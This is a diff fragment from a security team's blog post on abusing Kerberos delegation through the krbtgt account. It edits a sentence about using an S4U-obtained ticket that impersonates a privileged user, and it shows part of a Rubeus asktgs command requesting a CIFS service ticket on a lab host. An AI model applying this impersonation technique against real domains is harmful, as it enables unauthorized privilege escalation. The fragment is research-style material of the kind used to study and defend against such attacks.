airbus-cert/skyblue.team/content/posts/delegate-krbtgt.md

 ## Asking a TGS for any service now using the TGS(T) received from s4u

-Then we can ask a TGS for a sensible service using the ticket get from s4u that impersonate a high privilege user, and can act as a TGT!
+Finally, we can ask a TGS for a sensible service using the ticket get from `s4u` that impersonate a high privilege user, and can act as a TGT!

 ```
 c:\work\dev\Rubeus\Rubeus\bin\Debug>Rubeus.exe asktgs /ticket:sylvain_krbtgt_COSMOS /domain:COSMOS /dc:127.0.0.1 /service:cifs/WIN-P8AJE4ISDL7